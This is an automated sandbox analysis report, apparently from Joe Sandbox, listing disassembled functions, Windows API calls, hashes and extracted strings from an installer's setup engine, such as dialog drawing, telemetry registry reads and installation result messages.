                                                                                              • Instruction ID: 093d06db5dbb743656d35eec4700df9939e3aeab292ad8eaef0a9811247b6e55
                                                                                              • Opcode Fuzzy Hash: e7e296a3a4675f0c835f550e71779207a3a29053b0f4b5dc83944df730e91a5c
                                                                                              • Instruction Fuzzy Hash: C7415B71A00388AFDB40DFD4CCC4F9E7BF9AB48388F550429E615EB951D771A9888F15
                                                                                              Function 639609E0 Relevance: 16.9, APIs: 11, Instructions: 430windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 639609E7
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 63960A02
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 63960AEE
                                                                                              • ShowWindow.USER32(00000000,00000001,00000000,?,?,?,40000000,?,?,00000000), ref: 63960B68
                                                                                              • SendMessageW.USER32(00000000,00000030,?,00000001), ref: 63960B78
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 6394F5AC
                                                                                                • Part of subcall function 6394F589: GetObjectW.GDI32(00000000,0000005C,?), ref: 6394F5B5
                                                                                                • Part of subcall function 6394F589: CreateFontIndirectW.GDI32(?), ref: 6394F600
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 6394F610
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000010), ref: 63960C2A
                                                                                              • SendMessageW.USER32(00000000,00000170,?,00000000), ref: 63960C70
                                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 63960CA3
                                                                                                • Part of subcall function 6395F933: SendMessageW.USER32(?,00000172,00000000,?), ref: 6395F944
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 63960DAB
                                                                                              • SendMessageW.USER32(?,00000030,?,00000001), ref: 63960E0A
                                                                                              • ShowWindow.USER32(?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,6397677E,000000FF), ref: 63960E15
                                                                                                • Part of subcall function 6395F8DE: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,00000000,?), ref: 6395F91E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$CreateDialogImageLoadRectShow$FontH_prolog3H_prolog3_IndirectObject
                                                                                              • String ID:
                                                                                              • API String ID: 2777900791-0
                                                                                              • Opcode ID: 82100d28dd2233a3da15e04b0a21cbd686e08abde2d58f3cd337cb70a212bf69
                                                                                              • Instruction ID: 5d0d94713792e4db6a63c80f0bbcb3c8856859f9b6476cefb3944ac3048e9fa5
                                                                                              • Opcode Fuzzy Hash: 82100d28dd2233a3da15e04b0a21cbd686e08abde2d58f3cd337cb70a212bf69
                                                                                              • Instruction Fuzzy Hash: 4E02F375A00208AFDB04DFA8C998A9DBBF6FF8E711B148059F506AB361DB35E941CF50
                                                                                              Function 63958A1A Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63958A21
                                                                                              • GetTickCount.KERNEL32 ref: 63958A38
                                                                                                • Part of subcall function 63958C2A: __EH_prolog3.LIBCMT ref: 63958C31
                                                                                              • GetTickCount.KERNEL32 ref: 63958A52
                                                                                              • SetWindowTextW.USER32(?,?), ref: 63958A99
                                                                                              • GetDlgItem.USER32(?,0000006F), ref: 63958AC3
                                                                                              • GetDlgItem.USER32(?,00000070), ref: 63958AE5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountH_prolog3ItemTick$TextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3171788341-0
                                                                                              • Opcode ID: 15319ebdb278448bc955440ca8ae8efcc1baf19b7cdccceb389cac389f341670
                                                                                              • Instruction ID: 96708500d3b4583d6219b1ac76d0d534f1c8e1cdc8b4dea8013d92f12d735a86
                                                                                              • Opcode Fuzzy Hash: 15319ebdb278448bc955440ca8ae8efcc1baf19b7cdccceb389cac389f341670
                                                                                              • Instruction Fuzzy Hash: 9B61F275A006069FDB04EFB4C998AAEBBB5BF09704F100968F156EB3A1DB34E914CF51
                                                                                              Function 6C5D4611 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 215COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D46A1
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 6C5D46B4
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 6C5D46CD
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 6C5D46DF
                                                                                                • Part of subcall function 6C5D3E29: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00020018,00000000,80000002,CEIPEnable,00000002), ref: 6C5D3E94
                                                                                                • Part of subcall function 6C5D3E29: RegQueryValueExW.ADVAPI32(00000000,00000002,00000000,?,?,00000004), ref: 6C5D3EB0
                                                                                                • Part of subcall function 6C5D3E29: RegCloseKey.ADVAPI32(00000000), ref: 6C5D3ECE
                                                                                              • GetLastError.KERNEL32 ref: 6C5E0A56
                                                                                              • GetLastError.KERNEL32 ref: 6C5E0A93
                                                                                              • GetLastError.KERNEL32 ref: 6C5E0ABD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateEvent$CloseCountCriticalInitializeOpenQuerySectionSpinValuememset
                                                                                              • String ID: SamplingInterval$Software\Microsoft\SQMClient
                                                                                              • API String ID: 171072326-987520630
                                                                                              • Opcode ID: 0e7466a666d84dba2b981db935d0d4e1a97ab7f1ea00846361ecae78fe14d5e6
                                                                                              • Instruction ID: 8f78fb78cb8142cffc525c9f5ba55e99de4c768d289f2909a2b18f5f639dcea2
                                                                                              • Opcode Fuzzy Hash: 0e7466a666d84dba2b981db935d0d4e1a97ab7f1ea00846361ecae78fe14d5e6
                                                                                              • Instruction Fuzzy Hash: 3F817F70600394AFD724CF198C84FAABBF9FB85748F15085EE165D6AA0C7B0E945CF18
                                                                                              Function 63957389 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 162COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63957390
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394C9BB: __EH_prolog3.LIBCMT ref: 6394C9C2
                                                                                                • Part of subcall function 6394D1B4: __EH_prolog3.LIBCMT ref: 6394D1BB
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63957420
                                                                                                • Part of subcall function 6396DBDB: RaiseException.KERNEL32(?,?,63969236,?,?,?,?,?,63969236,?,63977F54,639822B4), ref: 6396DC1D
                                                                                                • Part of subcall function 6395EB56: __wcsicoll.LIBCMT ref: 6395EB74
                                                                                              • __aulldiv.LIBCMT ref: 639574F1
                                                                                              • __aulldiv.LIBCMT ref: 639574FD
                                                                                              Strings
                                                                                              • %I64u, xrefs: 6395748A
                                                                                              • $$DownloadSizeEstimate$$, xrefs: 63957436
                                                                                              • $$DownloadTimeOverDialup$$, xrefs: 63957523
                                                                                              • Setup engine failed to initialize. engineDataProvider.InitializeItems() returned false, xrefs: 639573B2
                                                                                              • $$DownloadTimeOverBroadband$$, xrefs: 639574B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$__aulldiv$ExceptionException@8RaiseThrow__wcsicoll
                                                                                              • String ID: $$DownloadSizeEstimate$$$$$DownloadTimeOverBroadband$$$$$DownloadTimeOverDialup$$$%I64u$Setup engine failed to initialize. engineDataProvider.InitializeItems() returned false
                                                                                              • API String ID: 1088788417-581573194
                                                                                              • Opcode ID: 4cde9425fcee9369d914659f09bfffa738b95ffd58549d3c33d12b892259bacc
                                                                                              • Instruction ID: c151015feb703caa7321a6d626bb103550c022ea287db8f9c11518cb702a6bcc
                                                                                              • Opcode Fuzzy Hash: 4cde9425fcee9369d914659f09bfffa738b95ffd58549d3c33d12b892259bacc
                                                                                              • Instruction Fuzzy Hash: F151D571D003089FEB10CFA4C844BAEB7F9AF51B68F148555F555AB282DB30DB508FA1
                                                                                              Function 6394C78F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SysStringLen.OLEAUT32(?), ref: 6394C7FD
                                                                                              • __time64.LIBCMT ref: 6394C8B6
                                                                                                • Part of subcall function 6394C280: __EH_prolog3.LIBCMT ref: 6394C287
                                                                                                • Part of subcall function 6394C280: OutputDebugStringW.KERNEL32(?,?,?,00000008,6394C856), ref: 6394C2A8
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6394C894
                                                                                              Strings
                                                                                              • Final Result: Installation aborted, xrefs: 6394C827, 6394C835
                                                                                              • Final Result: Installation completed successfully with success code: (0x%08lX), xrefs: 6394C80C
                                                                                              • Final Result: Installation completed successfully with success code: (0x%08lX), "%s", xrefs: 6394C818
                                                                                              • Final Result: Installation failed with error code: (0x%08lX), xrefs: 6394C869
                                                                                              • Final Result: Installation failed with error code: (0x%08lX), "%s", xrefs: 6394C87E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$DebugFreeH_prolog3Output__time64
                                                                                              • String ID: Final Result: Installation aborted$Final Result: Installation completed successfully with success code: (0x%08lX)$Final Result: Installation completed successfully with success code: (0x%08lX), "%s"$Final Result: Installation failed with error code: (0x%08lX)$Final Result: Installation failed with error code: (0x%08lX), "%s"
                                                                                              • API String ID: 1943088043-1330816492
                                                                                              • Opcode ID: c831666d2c174528583442e0a8d2a69aa3d665bfa024bab4d9c6dc7cc99b4780
                                                                                              • Instruction ID: 415f304823732d3f0954e24279b8041b5bc586aa033bbb78eae45d61cff0c010
                                                                                              • Opcode Fuzzy Hash: c831666d2c174528583442e0a8d2a69aa3d665bfa024bab4d9c6dc7cc99b4780
                                                                                              • Instruction Fuzzy Hash: 2151617150C341AFD310DF78D984A4BBBE9EF96B28F040A1DF49197292D731D9188FA2
                                                                                              Function 6395795B Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63957962
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • EnumWindows.USER32(63957C3F,?), ref: 639579BF
                                                                                                • Part of subcall function 63957BC5: _calloc.LIBCMT ref: 63957BE6
                                                                                                • Part of subcall function 63957AC7: __EH_prolog3.LIBCMT ref: 63957ACE
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 63957ABB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$EnumExceptionRaiseWindows_calloc
                                                                                              • String ID: complete$Action$Blocking Processes$Enumerating incompatible processes$No Blocking Processes$[ProcessID] [ImageName] [WindowTitle] [WindowVisible]
                                                                                              • API String ID: 3326300193-1989790735
                                                                                              • Opcode ID: 48a9313a351e26a60fb27dc8217625b900abec77899462278536b3e7f835aaba
                                                                                              • Instruction ID: a4d5b136db9a54c8bde892a7237d9330930523dbaedefadbb19d66c17b4328f1
                                                                                              • Opcode Fuzzy Hash: 48a9313a351e26a60fb27dc8217625b900abec77899462278536b3e7f835aaba
                                                                                              • Instruction Fuzzy Hash: 4B418F71900249EFEB01DFA8C884F9DBBB5AF59B28F148449F544EB282C771DA818F61
                                                                                              Function 6395C626 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395C62D
                                                                                              • SetWindowTextW.USER32(?,?), ref: 6395C63D
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • SetDlgItemTextW.USER32(?,00000065,00000000), ref: 6395C666
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 6395C6A1
                                                                                              • SetDlgItemTextW.USER32(?,00000002,00000000), ref: 6395C6DC
                                                                                              • GetParent.USER32(?), ref: 6395C6EF
                                                                                                • Part of subcall function 6394E153: GetWindowLongW.USER32(?,000000F0), ref: 6394E179
                                                                                                • Part of subcall function 6394E153: GetParent.USER32 ref: 6394E18B
                                                                                                • Part of subcall function 6394E153: GetWindowRect.USER32(?,?), ref: 6394E1A5
                                                                                                • Part of subcall function 6394E153: GetWindowLongW.USER32(?,000000F0), ref: 6394E1BB
                                                                                                • Part of subcall function 6394E153: MonitorFromWindow.USER32(?,00000002), ref: 6394E1DA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Text$Item$H_prolog3LongParent$FromMonitorRect
                                                                                              • String ID: IDS_REBOOT_REQUIRED$IDS_RESTART_LATER$IDS_RESTART_NOW
                                                                                              • API String ID: 1194771093-931079857
                                                                                              • Opcode ID: 710843fc2d265148980eae688a5c12cb71d96d2e5bcd559bb6ce9d095a26a011
                                                                                              • Instruction ID: 23a50821f549572d227f65dbcd7eae3aa1d4ad473281429c4096360c34aaaf1b
                                                                                              • Opcode Fuzzy Hash: 710843fc2d265148980eae688a5c12cb71d96d2e5bcd559bb6ce9d095a26a011
                                                                                              • Instruction Fuzzy Hash: BC313E71900205DFDF10EFA8C888A9D7BB5FF4AB29B244698F155DB2A5C7319950DF10
                                                                                              Function 63961601 Relevance: 15.5, APIs: 10, Instructions: 459windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 63961656
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 6396175E
                                                                                              • ShowWindow.USER32(00000001,00000001,?,?,?,?,40000000,?,?,00000000), ref: 639617E3
                                                                                              • SendMessageW.USER32(?,00000030,?,00000001), ref: 639617F5
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 6394F5AC
                                                                                                • Part of subcall function 6394F589: GetObjectW.GDI32(00000000,0000005C,?), ref: 6394F5B5
                                                                                                • Part of subcall function 6394F589: CreateFontIndirectW.GDI32(?), ref: 6394F600
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 6394F610
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000010), ref: 639618AD
                                                                                              • SendMessageW.USER32(?,00000170,?,00000000), ref: 639618FA
                                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 63961931
                                                                                                • Part of subcall function 6395F933: SendMessageW.USER32(?,00000172,00000000,?), ref: 6395F944
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 63961A58
                                                                                              • SendMessageW.USER32(?,00000030,?,00000001), ref: 63961ABD
                                                                                              • ShowWindow.USER32(?,00000001,?,00000000), ref: 63961AC8
                                                                                                • Part of subcall function 6395F8DE: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,00000000,?), ref: 6395F91E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$CreateDialogImageLoadRectShow$FontH_prolog3IndirectObject
                                                                                              • String ID:
                                                                                              • API String ID: 727718542-0
                                                                                              • Opcode ID: 525b5b38c515de5c1cbe4a1c550a1ad2c9527e77c760fb668d70460685cd44b1
                                                                                              • Instruction ID: a7ed2a0d309b16757171883aff79504414b2d098cb5ef550112d21c4071174a5
                                                                                              • Opcode Fuzzy Hash: 525b5b38c515de5c1cbe4a1c550a1ad2c9527e77c760fb668d70460685cd44b1
                                                                                              • Instruction Fuzzy Hash: C702F075608300AFDB05DF68C888A1ABBE6FF8AB14F104959F586CB361DB35D845CF92
                                                                                              Function 6396210E Relevance: 15.5, APIs: 10, Instructions: 457windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 6396215F
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 63962267
                                                                                              • ShowWindow.USER32(?,00000001,?,?,?,?,40000000,?,?,00000000), ref: 639622ED
                                                                                              • SendMessageW.USER32(?,00000030,?,00000001), ref: 639622FF
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 6394F5AC
                                                                                                • Part of subcall function 6394F589: GetObjectW.GDI32(00000000,0000005C,?), ref: 6394F5B5
                                                                                                • Part of subcall function 6394F589: CreateFontIndirectW.GDI32(?), ref: 6394F600
                                                                                                • Part of subcall function 6394F589: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 6394F610
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000010), ref: 639623BB
                                                                                              • SendMessageW.USER32(?,00000170,?,00000000), ref: 63962408
                                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 6396243C
                                                                                                • Part of subcall function 6395F933: SendMessageW.USER32(?,00000172,00000000,?), ref: 6395F944
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 6396255F
                                                                                              • SendMessageW.USER32(?,00000030,?,00000001), ref: 639625C4
                                                                                              • ShowWindow.USER32(?,00000001,?,00000000), ref: 639625CF
                                                                                                • Part of subcall function 6395F8DE: CreateWindowExW.USER32(00000000,STATIC,?,?,?,?,?,?,?,?,00000000,?), ref: 6395F91E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$CreateDialogImageLoadRectShow$FontH_prolog3IndirectObject
                                                                                              • String ID:
                                                                                              • API String ID: 727718542-0
                                                                                              • Opcode ID: 6fd871d160e8d5ef97d0e0b775574b5bc39f911a42c173c5badf6ac379a38e5b
                                                                                              • Instruction ID: c06623219eb599fb2bc56cfdfa925eb67e7624b78ea65b3e7794c4997fc77f05
                                                                                              • Opcode Fuzzy Hash: 6fd871d160e8d5ef97d0e0b775574b5bc39f911a42c173c5badf6ac379a38e5b
                                                                                              • Instruction Fuzzy Hash: D10212756083019FDB04DF68C898A1ABBF6FF8A754F004969F5868B361DB30D844CF92
                                                                                              Function 6C5D1A6B Relevance: 15.1, APIs: 10, Instructions: 133sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedCompareExchange.KERNEL32(6C5F0164,?,00000000), ref: 6C5D1AB1
                                                                                              • _initterm.MSVCRT ref: 6C5D1AF8
                                                                                              • InterlockedExchange.KERNEL32(6C5F0164,00000000), ref: 6C5D1B0E
                                                                                              • InterlockedCompareExchange.KERNEL32(6C5F0164,00000001,00000000), ref: 6C5D1D46
                                                                                              • free.MSVCRT ref: 6C5D1D7A
                                                                                              • InterlockedExchange.KERNEL32(6C5F0164,00000000), ref: 6C5D1D9C
                                                                                              • Sleep.KERNEL32(000003E8,?,00000000,?,?,6C5D1DDB,?,00000001,?,?,?,?,6C5D1C70,0000002C), ref: 6C5E451B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExchangeInterlocked$Compare$Sleep_inittermfree
                                                                                              • String ID:
                                                                                              • API String ID: 546057305-0
                                                                                              • Opcode ID: 95a52fff75cf025f7bf7a632f69a7114fcd20feda4c623dbdf38b750eed5c5f7
                                                                                              • Instruction ID: ec77ffa72cba2d1c982e4ab2d3e1360f57f97aea3810c844c347730c318e670d
                                                                                              • Opcode Fuzzy Hash: 95a52fff75cf025f7bf7a632f69a7114fcd20feda4c623dbdf38b750eed5c5f7
                                                                                              • Instruction Fuzzy Hash: 83418E71345340EBEB04ABA99C44B5B33B9EB86379F16452AE521CA991E730E840CF2D
                                                                                              Function 63958FA4 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 310COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 63961169: __EH_prolog3.LIBCMT ref: 63961170
                                                                                                • Part of subcall function 63961169: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 639611B1
                                                                                                • Part of subcall function 639610EB: __EH_prolog3_GS.LIBCMT ref: 639610F5
                                                                                                • Part of subcall function 639610EB: _memset.LIBCMT ref: 63961121
                                                                                                • Part of subcall function 639610EB: GetTempPathW.KERNEL32(00000104,?,Action,?,00000000), ref: 63961135
                                                                                                • Part of subcall function 6395E98E: __EH_prolog3_GS.LIBCMT ref: 6395E995
                                                                                                • Part of subcall function 6395E98E: _wmemcpy_s.LIBCMT ref: 6395EA2A
                                                                                                • Part of subcall function 6395F0E8: __EH_prolog3.LIBCMT ref: 6395F0EF
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63957FE0: __EH_prolog3.LIBCMT ref: 63957FE7
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(?,?,?,00000014,63959180,?,?,?,?,?,?,?,?), ref: 63958015
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(?), ref: 6395801C
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(?,?,?,?), ref: 63958064
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(?), ref: 6395806B
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(00000001,00000001,?,?), ref: 639580B3
                                                                                                • Part of subcall function 63957FE0: PathGetDriveNumberW.SHLWAPI(?), ref: 639580BA
                                                                                                • Part of subcall function 63958ECA: __EH_prolog3.LIBCMT ref: 63958ED1
